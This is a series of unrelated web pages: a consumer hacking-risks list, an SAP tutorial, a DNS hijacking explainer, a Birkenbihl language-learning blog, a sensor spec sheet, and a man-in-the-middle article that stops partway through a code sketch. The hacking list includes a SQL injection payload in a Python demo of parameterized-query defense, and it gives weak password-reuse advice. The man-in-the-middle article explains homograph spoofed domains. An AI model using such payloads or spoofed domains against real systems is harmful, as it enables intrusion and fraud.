Sustainability is the motto for corporate transparency, ethics, and forward-thinking. All companies of any size must consider a sustainable strategy to align with consumer trends and expectations. But beyond this self-interested business case is the outward-facing attitude toward the future, ensuring a brighter, greener tomorrow for the benefit of employees, shareholders, and customers. | <urn:uuid:70867b2e-ceb4-48d4-ba1e-2c684a246989> | CC-MAIN-2022-40 | https://www.digital-adoption.com/sustainable-business-strategy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00295.warc.gz | en | 0.926212 | 2,275 | 2.796875 | 3 |
Paying attention to how you use the internet, and putting some simple safeguards in place, can help prevent most of these top 10 ways you can be hacked.
10. Stolen Credentials
Don’t use the same password for all of your online accounts. I know this is a pain, so how about using the name of the company that you are logging into … with your same password.
If my favorite password is “TonyRocks,” I could use:
At Amazon: “AmazonTonyRocks”
At Gmail: “GmailTonyRocks”
At Wells Fargo: “WellsfargoTonyRocks”.
This way you can use your favorite password and, at the same time, use a different password for all of your accounts!
9. Phishing, The Ultimate Human Error
A general phishing campaign that uses only 10 messages has a better than 90 percent chance of getting a click, according to phishing defense vendor ThreatSim. What does this mean? DON’T CLICK ON THINGS if you do not know what they are.
8. Back-Door Access
Once a cybercriminal establishes a foothold, a back door helps them maintain remote access to an infected system. They remain stealthy, while often uploading more Malware, or creeping to systems containing more sensitive data. Nothing is free on the internet. When you download a game, music, a program, or whatever you are downloading, you must know that something else might be coming in and getting installed on your computer.
7. Spyware
Spyware attempts to steal user credentials. It is associated with keyloggers, which can record keystrokes or take a screenshot of the victim’s monitor. Again, nothing is free, so be careful when downloading anything from the internet.
6. Capture Stored Data
BlackPOS, a memory scraping Malware that was used in the massive Target breach, successfully vacuumed up data that had been temporarily stored in clear text, in point-of-sale system memory. Again, nothing is free, so be careful when downloading anything from the internet.
5. SQL Injection
SQL injection is a common and longstanding technique used in web application attacks, popular because widely available automated tools can detect and exploit these flaws, security experts said. Be careful where you go when online. Adult sites are the worst, but free software sites can be just as bad. DO NOT USE INTERNET EXPLORER when going to suspicious sites.
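To see why SQL injection works, and how parameterized queries defend against it, here is a sketch using Python's built-in sqlite3 module. The table and the payload are illustrative only:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user')")

hostile = "' OR '1'='1"  # classic injection payload

# Vulnerable: string concatenation lets the payload rewrite the query logic.
unsafe = conn.execute(
    "SELECT name FROM users WHERE name = '" + hostile + "'").fetchall()

# Safe: a parameterized query treats the payload as plain data, not SQL.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (hostile,)).fetchall()

print(unsafe)  # [('alice',), ('bob',)] -- every row leaked
print(safe)    # [] -- no user is literally named "' OR '1'='1"
```

The same parameterization principle applies in every database library, which is why automated injection scanners look specifically for string-built queries.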
4. Brute-Force Attacks
Weak and default passwords are a favorite target of criminals, who use brute-force attacks to pry their way into systems. Always use different passwords and make them good ones: use upper and lower case letters, numbers, and symbols.
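A rough way to quantify that advice: the brute-force search space grows with both password length and character-set size. The figures below are candidate counts only, not cracking times, and assume an attacker must try the full space:

```python
import string

def search_space(length, charset_size):
    """Number of candidate passwords a brute-force attacker must try."""
    return charset_size ** length

lower = len(string.ascii_lowercase)                                     # 26
mixed = len(string.ascii_letters + string.digits + string.punctuation)  # 94

weak = search_space(8, lower)
strong = search_space(8, mixed)
print(f"8 lowercase letters : {weak:.1e} candidates")
print(f"8 mixed characters  : {strong:.1e} candidates")
print(f"ratio: {strong // weak:,}x more work for the attacker")
```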
3. Rootkits
Rootkits are Malware packages that establish a foothold and enable an attacker to gain complete control of an infected system. Rootkits work by getting into the underlying operating system processes, making them difficult to detect. These are very hard to remove. Again, nothing is free, so be careful when downloading anything from the internet.
2. Tampering
In the Verizon report, tampering refers to gaining physical access to an automated teller machine or a gas pump terminal to install a skimming device that reads data from credit card swipes. This is not for a regular computer, but still, be careful what you download.
1. Privilege Abuse
Privilege abuse happens when an employee, or trusted partner, takes advantage of system access privileges that they are granted, and uses them to simply view files or conduct data theft, according to Verizon. The report said that, of all the insider misuse security incidents it analyzed, 88 percent involved some form of privilege abuse. Always keep network files locked up. If you need help with this, Frankenstein Computers is happy to be of service. | <urn:uuid:627b430b-ea89-416c-9d0d-2cbae8651c21> | CC-MAIN-2022-40 | https://www.fcnaustin.com/top-10-ways-can-hacked/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00295.warc.gz | en | 0.907495 | 826 | 2.734375 | 3 |
In this SAP BASIS tutorial, we will discuss stacks of SAP systems. You will learn about three types of application stacks that are used in SAP software. SAP system is divided into three different types according to which stack it uses. The explanation about these stacks is below.
ABAP SAP System (ABAP Stacks)
A complete infrastructure in which ABAP-based applications can be developed and used. ABAP systems are developed using the ABAP programming language.
Example: SAP ERP.
Java SAP System (Java Stack)
A complete infrastructure for running J2EE applications.
Example: SAP Enterprise Portal.
ABAP and Java SAP System (Dual Stack)
Offers both ABAP and Java technologies in one system and database, but with two different database schemas.
Example: SAP Solution Manager 7.1.
Did you like this tutorial? Have any questions or comments? We would love to hear your feedback in the comments section below. It’d be a big help for us, and hopefully something we can address in future improvements to our free SAP BASIS tutorials.
Go to next lesson: SAP Message Server and Dispatcher
Go to previous lesson: SAP Application Server Instances
Go to overview of the course: Free SAP BASIS Training | <urn:uuid:ea8d7085-24fb-4b6c-a02a-f4ea66ce715a> | CC-MAIN-2022-40 | https://erproof.com/basis/free-training/sap-abap-and-java-stacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00295.warc.gz | en | 0.866634 | 272 | 2.90625 | 3 |
The Problem: So the story goes that in December of 1955, an officer of the United States Air Force receives a call on a classified hotline phone at a secure location. This number is to be used only in cases of extreme emergency, so he fears the worst when picking it up. On the other end of the phone, a tiny voice asks “Is this Santa Claus?”. The officer was understandably confused, but before long they were overwhelmed by calls from people attempting to call the north pole. The cause of this was a Sears Roebuck ad asking people to call Santa directly and listed a number. However, due to a printing error, the number that was listed was not the one to contact a sales person for Sears, but a commanding officer at NORAD- the North American Aerospace Defense Command. So instead of receiving an order from the White House, they were getting calls from children asking if they were elves.
“DNS Hijacking” is the act of redirecting traffic from its intended destination by way of changing where a particular URL points to (as in the recent case of Lenovo). DNS (Domain Name System) is essentially the Internet’s phone book: It is a massive, massive list of records, each containing a human-friendly domain name such as “www.amazon.com” and the IP (Internet Protocol) address that it corresponds to, such as “126.96.36.199”. When IP addresses change, such as going from one location to another, the DNS records can be updated so that from the user’s perspective when they type in the URL nothing has changed. So in our example, the DNS record is the advertisement, the URL ‘Santa’, and the IP address the mistyped phone number.
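The phone-book lookup described above can be reproduced with a single call to the system resolver. "localhost" is used here only because it resolves without a network connection; for a real domain, a hijacked resolver would hand back a different address than the legitimate one:

```python
import socket

def resolve(hostname):
    """Ask the system resolver (ultimately DNS or the HOSTS file) for the
    IP address behind a human-friendly name -- the Internet's phone book."""
    return socket.gethostbyname(hostname)

print(resolve("localhost"))  # 127.0.0.1
```

Comparing the answer from your default resolver against a trusted one (such as OpenDNS, discussed below as an alternative) is one simple way to spot a suspicious redirection.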
The Solution: DNS Hijacking is a function that can be done at a number of different levels- either at the user level by way of malware on the affected system, all the way up to poisoning the DNS server itself that the user is performing a look-up against. This is done for a number of different reasons- sometimes for direct payments in a style similar to ransomware, other times for advertising revenue, or for malware distribution. We will be looking at defending against this type of attack at a lower level.
Solution the First: Contact your ISP
ISP’s recently have begun using DNS lookups to inject their own ads and error pages directly into user’s web browsers- resulting in potential privacy, security and censorship issues. Most ISP’s that perform this action provide a method to ‘opt-out’ of this type of modification, and the method of doing so varies from provider to provider- either through a web form or through a phone call. There are however some hostile providers that believe that if you do not want to be tracked, that you should not use their DNS servers which leads us to our next solution.
Solution the Second: OpenDNS
OpenDNS offers the use of their DNS servers free of charge for public use, which can be used on any internet-connected device. They also support the use of DNS Encryption- protecting lookups from end to end. If you start to run into problems with your ISP’s DNS servers- whether that is downtime or issues with what they are directing you to, this is an excellent alternative to consider.
Solution the Third: Malware Defenses
Spybot and MalwareBytes are exceptionally good anti-malware utilities that have free versions available for home use. If you begin seeing unusual activity when you try to log on to sites such as www.google.com, you may have malware installed on your computer which is redirecting your request to a different web server. Both products are excellent overall security tools, and are capable of protecting your HOSTS file, a hard-coded lookup method that pre-dates DNS but is still in use on most computers.
DNS Hijacking is one of the few types of attacks that scales to an incredible degree depending on the skill of the attacker: from a single system, to the 13 root DNS Servers of the Internet. It is also a method that many otherwise legitimate organizations feel that they can use to help line their pockets by redirecting bad look-ups to their own websites. Regardless of the intent, it is still changing traffic from where it needs to go and needs to be prevented wherever possible. | <urn:uuid:41d3e458-a787-44d0-97f9-8026198e8e2c> | CC-MAIN-2022-40 | https://www.lifars.com/2015/03/weird-security-term-of-the-week-dns-hijacking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00295.warc.gz | en | 0.952565 | 910 | 2.859375 | 3 |
Given today’s leading technology story on BBC News highlighting why alarm bells are ringing over Computing in England’s schools, with the British Computing Society warning that the number of pupils studying for a computing qualification could halve by 2020, IT security experts from Mindtree and Thales e-Security commented below.
Guita Blake, Senior VP & Head of Europe at Mindtree:
“In the midst of the fourth industrial revolution, these statistics highlight the need for a significantly greater commitment to the ‘STEM agenda’ in the UK.
Inspiring the next generation of computer experts is critical for both the future of the IT industry, and the UK economy more broadly.
“The UK education system now needs to focus on inspiring the youth of today to equip themselves with the necessary skills that will enable them to thrive in the digital economy.”
Peter Carlisle, VP EMEA at Thales e-Security:
“With cyber-attacks increasing, a decline in young people taking computer science courses is unacceptable, especially when businesses are so desperate for specialist skills and support.
“To reverse this trend, industry must do more to provide training and work experience to help encourage the next generation to pursue a career in IT, which is now the frontline against hackers.” | <urn:uuid:86c7b39f-dc9c-4998-944d-956c3ece6392> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/expert-comments/computing-schools-alarm-bells-englands-classes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00295.warc.gz | en | 0.911687 | 267 | 2.609375 | 3 |
IoT Facilitates Enhancements to Water Management Systems
Work in IT long enough, and you'll know that when people talk about “the next big thing,” they’re never thinking big enough, or small enough. Over the last 30 years, every successful wave of innovation has been based on what already exists. From cell phones and computers, to the Internet itself, all successful technologies have been rapid, and incremental, expansions of existing small ideas into world spanning technology platforms. There are amazing things you can do with your network if you can feed information back into your processes, measure it and leverage the data to remotely monitor and respond to situations quickly. Even though Rain for Rent is an 80 year old brick and mortar company, we believe that the only way to stay relevant today is to continuously improve and prudently adopt new technology as it becomes available.
Our latest "next big thing" has been focused on machine-to-machine communication (M2M): devices talking to like devices. Machines are things that perform actions for us, and we'd like for them to be a bit more self-directed, or "smart". What makes machines “smart,” are the sensors, the small things that make all of this possible by measuring, evaluating, and transmitting data. The Internet of Things (IoT) really comes together with the connection of those sensors and a "brain" to the machines that perform work. Historically, that brain has been a human one, looking at water levels, temperatures, weather, etc.
By instrumenting our world, we can measure and control that world. Sensors have existed for millennia, from the most basic, "look the river is rising" idea to smart home technology that can tell your sprinklers to turn off if it's raining. What the IoT enables is extending these sensors to all aspects of our lives, and then giving these sensors parameters that allow them to control the world for us via a computer.
Currently, we have a very large water and power project out in the desert, and all of our field tanks have remote monitoring capabilities that save the customer a significant amount of time. But with more network connectivity comes more potential for intrusion, so as we deploy our technologies to customers, we have also implemented multiple layers of protection.
Let’s look at an example. The water source for the City of Rome, NY was at risk because of a disintegrating concrete pipeline. In order to repair the pipeline, the contractor needed a bypass system with the pipeline traversing seven miles of densely wooded hills with significant elevation changes.
Rain for Rent provided a system that handled the flow easily during the repair, and our IoT strategy enabled us to run the complex, seven-mile-long system virtually unmanned. Typically, a job of this size would require almost hourly monitoring and many human touches. We were able to pass the cost savings on to the customer and ensure the water flowed to the town, while minimizing the environmental impact. The customer saved the cost of eight full-time employees on the job, and was also reassured that the system was bulletproof from both a reliability and a security point of view. We accomplished this by hardwiring the sensor arrays and using our standard defense-in-depth methodology, which involves isolating the system from all potential attackers.
Our equipment fleet is composed of very large, somewhat portable, assets. Given that our standard operating environment can vary from the scorching desert to extreme industrial environments, it's challenging to instrument everything. Actually attaching our IoT sensor arrays presents a challenge. In some cases, they can be hard wired, but in many cases, innovative enclosures and connectors have to be created to attach to our tanks, pumps, and pipes.
Let’s look at another example. One of our large customers operates a refinery in the southeast United States. For a refinery, time is money, and each day they produce fuels and feedstocks for industrial applications. Refineries also have to shut down operations periodically to clean up and get ready for another cycle of operations, shutdowns known as turnarounds. The most important considerations during a turnaround are safety, environmental cleanliness, and of course, time. These turnarounds involve safely managing hundreds of tons of waste product, and responsibly managing that product from start to final disposition.
Rain for Rent provided boxes and box-management technology that allowed the customer to leverage our IoT strategy. These boxes are about the size of a shipping container and are generally moved by large forklifts, taking a fair amount of abuse as they are loaded and unloaded. For our IoT strategy to work, our engineers had to figure out a way to attach the GPS/sensor units to the boxes in an enclosure that could resist a direct blow from the forks of an industrial forklift.
Our IoT technology enables geo-fences to be established around specific work areas to track box contents, box movement, and time on rent. Obviously, this information is highly sensitive and must be extremely auditable. We were able to assist the customer in managing their turnarounds, shaving days off and increasing the safety and visibility of the waste products, while saving them hundreds of man-hours. It is critically important to all parties to provide a level of security and visibility into waste tracking that had previously taken months to accomplish.
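A circular geo-fence check of the kind described above can be sketched in a few lines. This is an illustrative sketch only; the function names, coordinates, and radius are assumptions, not Rain for Rent's actual implementation:

```python
import math

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two lat/lon points."""
    r = 6_371_000  # mean Earth radius, metres
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = (math.sin(dp / 2) ** 2
         + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2)
    return 2 * r * math.asin(math.sqrt(a))

def inside_geofence(box_pos, fence_center, radius_m):
    """True if the box's GPS fix lies within the circular fence."""
    return haversine_m(*box_pos, *fence_center) <= radius_m
```

A monitoring loop would call `inside_geofence` on each GPS fix and raise an alert when a box leaves its assigned work area.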
As we look to the past for an indication of how rapid IoT adoption will be, we’re reminded of just how rapid Digital Revolution changes have been. Consider the rate of adoption of simple cell phones and Internet usage over 20 years. In 1990, cell phone subscribers made up just 0.25 percent of the world population, but that figure increased to 68 percent in 2010. Additionally, just 0.05 percent of the world population was using the Internet in 1990, but by 2010 that utilization had increased to 26.6 percent.
When evaluating any new opportunity, I like to ask myself, “What advice would I give my current self if I could look back at today from 10 years in the future?” I believe that IoT is going to encompass every aspect of our lives by 2020, and we need to be prudent and secure, as well as aggressive, in its implementation. This latest “big thing” represents a vast opportunity for all of us. Similar to all of the other rapid changes that have characterized this Digital Revolution from the 1970s until today, the changes will be both incremental and profound.
Do you know the best language learning tips?
My 13-year-old cousin watches all the movies in the original English language. “I want to study English later and travel a lot”. You can see the motivation in her shining eyes. “It makes me learn faster and better. School lessons don’t necessarily help.”
Her story made me sit up and take notice. Contrary to the belief that young people and children are no longer interested in anything today, there is evidence to suggest otherwise. “Many of my friends and I already speak English quite well. But we didn’t get that from school.”
Index cards and vocabulary lists are out. We asked students why: “Because it’s boring,” “Because it doesn’t do any good anyway,” “Because I don’t feel like looking at the pile of cards anymore.”
Parents who notice a gap in their child’s knowledge of a foreign language usually urge them to “finally learn the words.” They are not entirely wrong about this since vocabulary is the foundation for understanding a language. But the big difference lies in how you learn the words.
According to current psychological understanding, institutional language learning should be fundamentally and radically changed. Why this is not happening, we can only guess, which is why we prefer to offer you a practical solution: The Birkenbihl Approach.
Best Language Learning: The Birkenbihl Approach
For those who learn a new language as a child, teenager or adult in their natural environment (e.g. bilingually or in a foreign language school/kindergarten), their brain processes the new language in a similar way to their mother tongue. Based on this information, management trainer and bestselling author Vera F. Birkenbihl developed the Birkenbihl Approach for language learning.
The Birkenbihl Approach, based on decoding (word-for-word translation), allows you to learn the meaning of the words of the foreign language at the same time as the grammar.
By decoding, you can progress much faster. Let’s do an exercise with a simple German sentence and its word-for-word English decoding (an illustrative example):

Ich habe einen Hund.
I have a dog.
Read the above German sentence and English decoding several times. Now cover the decoding and try to decode the German words yourself. How many words have you translated correctly after such a short time? It’s so easy that you usually get over 90 % right the first time you try it. With a little practice, you quickly reach 100 %. Voilà! You have already mastered a whole meaningful sentence in a foreign language. Isn’t that great?
We recommend writing approx. 2 to 3 sentences of the foreign-language text on a sheet of paper. An A3 sheet is best ― as there is enough space on it for comments, drawings and anything else that makes it easier to remember. Of course, decoding also works digitally, e.g. with a text tool like Word.
All details and step-by-step instructions for decoding are in our blog post: Easy language learning by Vera F. Birkenbihl ― The Decoding Method.
The Birkenbihl method is originally a 4-step method:
1. Decode: Word-for-word translation of a foreign-language text into the native language.
2. Karaoke listening: Listen to the recording of the text and read the word-for-word translation until you understand the meaning of each word.
3. Background Listening: Passive listening to the previously actively heard text as you pursue other things in everyday life. No active concentration is necessary.
4. Activities: Speak the text yourself, have conversations in everyday life, and practise dialogues.
We now know that the method can be even simpler. The steps don’t have to follow strictly one after the other. You can, for example, start with background listening and tune into a foreign language (like during a stay abroad, where you are surrounded by it). There are also different ways you can do the word-for-word translation, but more about that later.
The significant advantages of the Birkenbihl Approach are apparent: With this method, your brain learns a new language in a very natural way ― without even memorizing a word or grammar rules. Instead, you simulate learning your mother tongue, using it, so to speak as a learning turbo.
The method is best suited for students because you can divide the steps optimally between classroom instruction and learning at home. Activities mainly take place in school ― speaking, reading, grammar exercises, deepening knowledge. At home, students can thoroughly prepare for the lesson, learn ahead, relearn and repeat. All they need is foreign language texts. Texts from textbooks that are used later in class are ideally suited for this purpose. In addition to the texts, there are usually audio recordings on a CD or as an mp3 download. Foreign language teaching is, therefore, an optimal prerequisite for the use of the Birkenbihl Approach!
Today we want to show you how pupils use the Birkenbihl Approach most effectively ― for good pupils who want to learn even more (like my cousin) and for pupils who have some catching up to do and have a hard time in school.
How Pupils Make Optimum Use of the Birkenbihl Approach
If you use the Birkenbihl Approach parallel to your school lessons, it is essential to work in advance. For this, you must use the audio material of the workbook. Go through phases 1 to 3 before the lesson in class!
Phase 1: Decoding
Translate the words of a lesson you already know. If you learn with a friend, you can also compare it with them and add more translations to your text. For the translation of unknown words, use the workbook or (online) dictionaries. In the beginning, you have to translate all the words because you have little previous knowledge. It only takes a little time, and then you only decode new words.
If a translation into another foreign language is easier for you than into your mother tongue, or if you want to include links and mnemonics, you can also decode some words into other languages. Drawings of the meanings of words are, of course, also allowed.
Phase 2: Karaoke Listening
To do this, use the listening material for the course. The order of the learning process in schools is usually unsuitable, as teachers often require speaking a foreign language from the very first lesson. But how do you know how to pronounce words if you’ve never heard them before? Children first hear their language for months before they make their first attempts at speaking. In the beginning, you make mistakes, which you usually correct yourself later. So listen to the lessons several times and read the decoding until you know the meaning of the words and the pronunciation.
Phase 3: Background Listening
By repeatedly listening to the foreign language in the background, you acquire a perfect pronunciation, preparing you for speaking the language in class ― and later in everyday life.
At school: strengthening and practicing
With such excellent preparation, the lessons in school become an activity. Even if grammar rules and other theoretical things like that are part of the lessons, you understand the content now, as you have already acquired some knowledge. Grammar exercises become fun for you.
How do pupils who have problems at school use the Birkenbihl Approach?
If we are honest with ourselves, we prefer to do things we are competent in, things we get good feedback for and tasks that give us pleasure. We don’t like to face things we feel overwhelmed by and which lack any fun. Therefore, the first hurdle of working with this new strategy can be a significant burden. Your child may resist. But one thing is sure: After a few days, your child will also recognize the benefits, notice that something is going on, and consequently develop self-motivation. For the time being, the aim should not be to achieve a better mark immediately in the next exam but to increase motivation and gain a certain familiarity with the foreign language. So dear parents: Hang in there.
To catch up, the student goes back three lessons and translates the words of the previous lessons word by word. Doing this, the pupil quickly catches up with the subject matter. Just 10 minutes a day helps enormously! Once the lessons dealt with at school have been made up, it is advisable to “discover” one or two lessons in advance. With this preparation, students are ready for the lessons and have more fun in the classroom. The lesson then becomes an exercise: to train pronunciation, to truly understand grammar, and to put it into practice. It is fun, and it motivates them to continue learning. Save yourself expensive tuition!
Additional exercise: speak in chorus.
Listen to a known text and talk with the audio “in chorus.” This step helps you to strengthen your knowledge of word meanings and grammar and refines your pronunciation.
The effect: things that you practice well can be performed more confidently, i.e. speaking becomes easier after this exercise. This exercise also works if you practise speaking in your mind, i.e. only speak in thought. Also use feelings and pictures to guide you: put yourself in the speaker’s place and visualize the pictures of the story in front of you.
Best Language Learning Tips: Practice with Listening Comprehensions, Films, and Series
Watching a series is fun for all students. In connection with the foreign language, this can be an excellent incentive to continue learning. Experience has shown that there is little resistance from young learners here.
A movie or series can be an excellent introduction to learning: watch a 20-minute episode, then decode a textbook text. The brain prepares and dives into the world of the foreign language. Or you can work entirely with the text of a series or a film. The scripts for films are usually available on the Internet. They can first be decoded independently, à la Birkenbihl. Then you have the reward of watching the film or series.
The biggest problem when learning a language through watching movies and television series is the speed of the audio, especially at the beginning. It’s simply too fast; the pupils can’t follow and don’t understand very much if anything at all. Brain-Friendly offers a solution for this.
Brain-Friendly.com has developed Birkenbihl language courses based on a funny series. You watch the show, and a two-line text (similar to a subtitle) appears at the bottom of the screen. This text is the decoding: above the foreign language, below the word-for-word translation into English. Parallel to the visual, the word pair lights up ― like in karaoke singing. So the student can read the text very well. The speed can be adjusted. So you use a slower speed at the beginning, then you can increase it to the original speed.
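The two-line, word-pair display described above can be sketched roughly as follows. This is an illustrative Python sketch of the alignment idea only, not Brain-Friendly's actual software, and it leaves out the karaoke-style highlighting and speed control:

```python
def karaoke_lines(pairs):
    """Render (foreign, decoding) word pairs as two aligned lines,
    foreign language on top, word-for-word translation below."""
    widths = [max(len(f), len(d)) for f, d in pairs]
    top = "  ".join(f.ljust(w) for (f, _), w in zip(pairs, widths))
    bottom = "  ".join(d.ljust(w) for (_, d), w in zip(pairs, widths))
    return top + "\n" + bottom

# Example: print(karaoke_lines([("Ich", "I"), ("habe", "have"),
#                               ("einen", "a"), ("Hund", "dog")]))
```

Each column is padded to the width of its longer word, so the learner's eye can jump straight from a foreign word to its decoding.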
Radio and Your Favourite Song
The same works with songs, by the way. The lyrics can be decoded and then listened to in an endless loop. It’s lots of fun, and you find out what the songs are really about. In many cases, they say something completely different than one would initially assume. (More tips on learning with music are here: Learning is Fun ― Learn a Language by Listening to Music.)
Following a program from a foreign radio station can also help to improve listening comprehension considerably. For example, you can recommend your child to choose a French, Spanish or German language channel suited to their musical taste. Due to the possibility of Internet radio, the selection is so vast that almost every young person should find a suitable program.
The 3 Best Reasons to (Pre-)Learn as a Student with the Birkenbihl Approach
1. Brain-Friendly Learning Steps
First, immerse yourself in the foreign language of your choice, then learn the rules. One caveat: because the Birkenbihl Approach skips explicit grammar study, it does not teach grammatical terminology, which matters at school and for certain certifications. The good news is that school lessons are full of grammar rules. Students therefore use the Birkenbihl Approach at home as preparation and to repeat and strengthen. In class, when discussing grammar, students can do very well and truly understand the rules: now that the content of an example sentence is understood, the rules make sense.
2. Experience of Success in Classrooms
If you traditionally learn vocabulary, for example, Dog=Hund, then you have the feeling that you have learned this word. (It would go beyond the scope of this article to explain why this is a deceptive feeling.) Vocabulary trainer apps additionally support this positive feeling by giving points for each correctly translated term. But understanding a single word doesn’t win you anything, and this shows in class: children who know only isolated words struggle to follow the teacher’s instructions and quickly tire of single-word drills.
If you use the Birkenbihl Approach, it works differently. The feeling of success comes when you understand a whole sentence or text. A child who uses the Birkenbihl Approach can answer intuitively and automatically, learning in a brain-friendly, holistic way.
The difference is that the brain does not hang on individual terms, but learns, understands and reacts holistically. Practice makes the master: the more often the child uses the Birkenbihl Approach at home, the easier it is to use the language in class. The lessons become games and exercises to strengthen and expand their skills.
3. Thinking in the Foreign Language
If you learn a vocabulary pair, such as “Messer-knife,” the brain must always translate first when using the foreign language. Only then can you decipher the meaning of the whole sentence, and only then can you react. You’ll notice it simply takes too long. The Birkenbihl Approach avoids this problem. By learning in whole sentences, you always have a whole sentence “ready.” You don’t have to think about what “knife” means in German but use the term intuitively. You think in the foreign language right from the start. This level is challenging to attain with traditional school teaching. Pupils engage far too little with the language (this is due to the limited time they spend in class, but also to the lack of motivation to do more at home). Only those who study a foreign language at university or use a foreign language daily at work begin to think in the language and thus use it automatically. The Birkenbihl Approach shortens this process: pupils can immerse themselves in the foreign language within a short time and learn it sustainably.
The Temperature/Humidity Sensor, used in conjunction with the NetGuardian or the KDA (with an analog card), allows a network manager to monitor the environmental status of a network site. The unit measures the temperature and relative humidity of the immediate network area, thus providing pertinent environmental information from the equipment site.
The Temperature/Humidity Sensor measures temperatures between +23 and +131 degrees Fahrenheit (-5 to +55 degrees Celsius). It also gauges relative humidity within the range of 10% RH to 90% RH. The NetGuardian or KDA (with an analog card) sends alarm notifications to network managers, via analog alarm inputs, if either the temperature or the relative humidity approaches levels that are too high or too low. Proper equipment operation thresholds are determined by the user; when these are exceeded, an alarm condition is triggered.
|RH Range:||10% RH to 90% RH.|
|Accuracy:||+/- 3% RH.|
|Input Voltage Range:||10 to 28 VDC.|
|Temperature Range:||+23 degrees F to +131 degrees F (-5 degrees C to +55 degrees C).|
|Accuracy:||+/- 0.54 degrees F (+/- 0.3 degrees C).|
|Total current draw:||4 mA.|
|Dimensions:||80mm x 80 mm x 26mm.|
|Weight:||8 oz. max.|
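The user-defined threshold logic described above can be sketched as follows. The band values and names here are illustrative assumptions, not the NetGuardian's actual configuration:

```python
# Hypothetical safe operating bands, set by the user.
THRESHOLDS = {
    "temp_f": (32.0, 100.0),       # degrees Fahrenheit
    "humidity_pct": (20.0, 80.0),  # percent relative humidity
}

def check_reading(name, value):
    """Return True if the reading is outside its safe band
    and should trigger an alarm condition."""
    low, high = THRESHOLDS[name]
    return not (low <= value <= high)
```

In a real deployment the monitoring unit would evaluate each analog input against its band and send a notification whenever `check_reading` comes back true.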
A temperature sensor is one of the most simple, yet the most critical, pieces of equipment available to monitor your server room, server closet, data center, or other telecom environment.
Frequently, temperature monitoring using temperature sensors is ignored or overlooked by network operators. Unfortunately, it is incredibly important (and also quite inexpensive) to monitor temperature in telecom and IT environments. Both extreme cold and high temperatures present a danger to your valuable telecom investment, and you must take care to monitor for both of these potential threats.
Malwarebytes reported a massive surge of 1,677% in the detection of spyware between January 1 and June 30, 2020. In a man in the middle attack, the attacker spies on the conversation between the server and client, using malware or other methods to do it. To combat and prevent these types of attacks, it helps to understand them first. So, let’s explore the types of man in the middle attacks that you need to know about…
Have you ever watched an action movie where a good spy (like James Bond or Black Widow) intercepts a secret communication? This person is what’s known as a man in the middle attacker, but we don’t mind in this case because they’re a “good guy/gal” in the film. But in a real world man in the middle attack, a MitM attacker’s intentions typically aren’t so good. Instead, a cybercriminal places themselves between two communicating parties so that they can intercept, read, and alter the data. The attacker can place themselves at any point along the communication chain to carry out this type of cyber attack.
But what are the different types of man in the middle attacks? Let’s explore them all more in depth.
Breaking Down 8 Types of Man in the Middle Attacks
A man in the middle attack can be used alone or as part of a bigger scheme. Either way, the purpose behind the attack is gaining information or money. A man in the middle attack, which can be carried out from any layer of the protocols governing the communication chain, can be separated into different types according to how an attacker carries it out (i.e., what methods they use).
But first, if you’re not sure what a man in the middle attack is, we’ve explained it all here.
Method 1: Attack on Encryption
Attacks on encryption can be launched at any of the three upper OSI layers: application, presentation, and transport.
Security protocols like SSL/TLS are used to secure the communication channel between the client and the server. However, sometimes cybercriminals manage to bypass or manipulate these security protocols to intercept a so-called “secure” communications. There are three types of man in the middle attacks on encryption. Let’s have a look.
1. HTTPS Spoofing
For this first type of man in the middle attack on our list, some experts say it’s a MitM attack while others say it’s a phishing attack method instead. With HTTPS spoofing, a criminal creates a fake HTTPS website by spoofing the address of a legitimate website. Then they send a link for this fake website to unsuspecting users who visit the fake site, opening themselves up to attack.
How Does an HTTPS Spoofing Attack Work?
In April 2017, security researcher Xudong Zheng presented a proof of concept showing how he could manipulate users into believing they were accessing the legitimate Apple website when, in reality, it was an imposter site. He did this by using special characters that look visually identical to letters of the Latin alphabet.
Xudong Zheng wanted to show how it was possible to register domains with foreign characters using Punycode. When Unicode characters were used to register the domain name “xn--pple-43d.com”, the domain name that was visually displayed was “apple.com.” This fake site used the Cyrillic “а” (U+0430) instead of the ASCII “a” (U+0061). This spoofing technique is also called script spoofing.
As many Unicode characters are difficult to distinguish from ASCII characters, cybercriminals can use them to register phony websites. The attackers can not only register DNS names that look like the original DNS, but they can also get low-level SSL certificates (i.e., domain validation certificates) for these websites to try to make them seem more legitimate. When an attacker sends the URL of a dodgy site to their target, the unsuspecting victim clicks on the URL and falls right into the criminal’s trap. This type of attack is also known as a homograph attack or internationalized domain name (IDN) homograph attack.
While the bad guys use homographic (also known as homoglyphic) attacks, the good guys have been working to protect us. Google Chrome version 51 and later, Microsoft Edge, Firefox, and Opera block sites that use more than one language for their IDN, and many browsers also warn users when they try to access such malicious sites.
The simplest way to avoid such scams is to never click on URLs sent to you via emails, messages, or pop-ups. If you want to visit a website, you should manually type the website name in your browser to shield yourself from a man in the middle attack.
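One heuristic defense against homograph domains is to flag labels that mix Unicode scripts or use a non-Latin script at all. The sketch below approximates a character's script from its Unicode character name; real browsers implement more nuanced IDN display policies, so treat this as an illustration only:

```python
import unicodedata

def scripts_in(label):
    """Approximate the set of Unicode scripts used in a domain
    label via the first word of each character's Unicode name
    (e.g. "LATIN", "CYRILLIC")."""
    scripts = set()
    for ch in label:
        if ch == "-" or ch.isdigit():
            continue  # hyphens and digits are script-neutral
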